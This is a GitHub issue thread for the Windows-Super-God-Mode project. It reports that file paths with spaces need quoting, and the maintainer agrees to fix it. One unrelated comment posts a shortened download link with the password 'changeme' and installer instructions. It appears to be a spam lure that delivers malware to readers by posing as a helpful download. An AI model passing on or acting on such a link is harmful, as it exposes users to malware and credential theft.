### ISSUE TITLE
File path targets that contain spaces are broken

### ISSUE THREAD

**Issue by mikrrice** [ThioJoe/Windows-Super-God-Mode#19]
File path targets that contain spaces need to be wrapped in quotes in order to function or they appear as broken links.

Example:
%ProgramFiles%\Windows Photo Viewer\ImagingDevices.exe
needs to be
"%ProgramFiles%\Windows Photo Viewer\ImagingDevices.exe"

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ThioJoe** [comment]
Ah good catch, I'll fix it for the next release
